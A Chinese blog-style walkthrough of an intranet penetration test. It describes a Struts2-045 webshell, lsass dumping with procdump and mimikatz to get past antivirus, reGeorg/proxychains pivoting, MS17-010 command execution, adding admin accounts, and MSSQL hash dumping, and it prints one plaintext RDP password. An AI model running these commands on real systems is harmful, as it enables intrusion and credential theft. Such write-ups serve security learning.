记一次内网渗透

前言

某次测试一网站发现struts2-045漏洞。通过翻看文件夹上传文件到不同端口进行访问。

进而getshell菜刀连接。

getshell

同样查看权限，添加用户远程连接。

whoami

在添加到管理员组的时候遇到阻碍。

false

server 2003的服务器。

无法连接

查看进程tasklist。。好像是安全狗。

safedog进程

ipconfig

在经过反复查找资料后，使用Procdump+Mimikatz直接获取管理员的密码。

参考资料：利用Procdump+Mimikatz获取Windows帐户密码

直接上传procdump工具。运行的条件为system。（版本为server 2003，不会被杀）

procdump.exe -accepteula -ma lsass.exe lsass.dmp

procdump.exe

将导出的lsass.dmp文件下载到本地。

这里使用mimikatz工具进行读取密码的时候，出现了错误。

error

解决方法：读取lsass.dmp报错

换一台机器，使用windows server 2003重新进行读取，果然可以。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

password

获取到的密码进行远程登录。依然不对。

查看一下端口是否被修改。

tasklist  /svc    查看TermService服务

TermService服务

netstat  -ano | find "2212"    查看3389的端口

8103

ok！！！

success

完美绕过卡巴斯基、安全狗。

注：一台服务器多个IP

内网渗透

使用reGeorg+Proxifier进行内网渗透。。

ok

使用kali运行reGeorg文件。

ok

然后配置proxychains。。

vim /etc/proxychains.conf

socks5

就可以将kali的一些工具代理进内网，比如metasploit、nmap。

ms17-010

使用任何工具前面添加proxychains即可。

ok

先对该11.0.0.1/24网段扫描一下ms17-010。。

use  auxiliary/scanner/smb/smb_ms17_010

ms17-010

扫描发现多台服务器存在ms17-010漏洞，但无法反弹shell。。

命令执行

那尝试使用ms17-010的执行系统命令的模块。

use auxiliary/admin/smb/ms17_010_command

options

ok

命令执行批量给几台服务器添加了admin管理员。

域服务

巧合的是该服务器还是域服务器，安装了卡巴斯基杀毒。。导致上传的exe马或mimikatz工具都被杀。

难怪无法反弹shell。。

后发现该网段大部分服务器都打了补丁、装了杀毒。

卡巴斯基

注：使用procdump+mimikatz同样可以获取windows帐户密码

还有一台11.0.0.50服务器。

可以通过rdesktop工具访问。。

proxychains rdesktop -u admin -p 1234qwer.. 11.0.0.50 -g 1024*800

rdesktop

11.0.0.50

该服务器未安装卡巴斯基，可以上传mimikatz工具获取管理员密码。

privilege::debug  提升权限

sekurlsa::logonpasswords  抓取密码

password

存活主机

使用for循环判断该网段存活主机。

for /l  %i  in (1,1,255) do @  ping  11.0.0.%i  -w  1  -n  1 |  find  /i  "ttl="

存活主机

弱口令

可以上传hsscan工具。。扫描该网段常见服务的一些弱口令。

弱口令

ok

配合弱口令，通过msf的mssql一些模块执行命令。

use auxiliary/scanner/mssql/mssql_hashdump

hash

use auxiliary/admin/mssql/mssql_exec

尝试执行系统命令，添加用户。

添加用户

ok

获得11.0.0.18的服务器。

success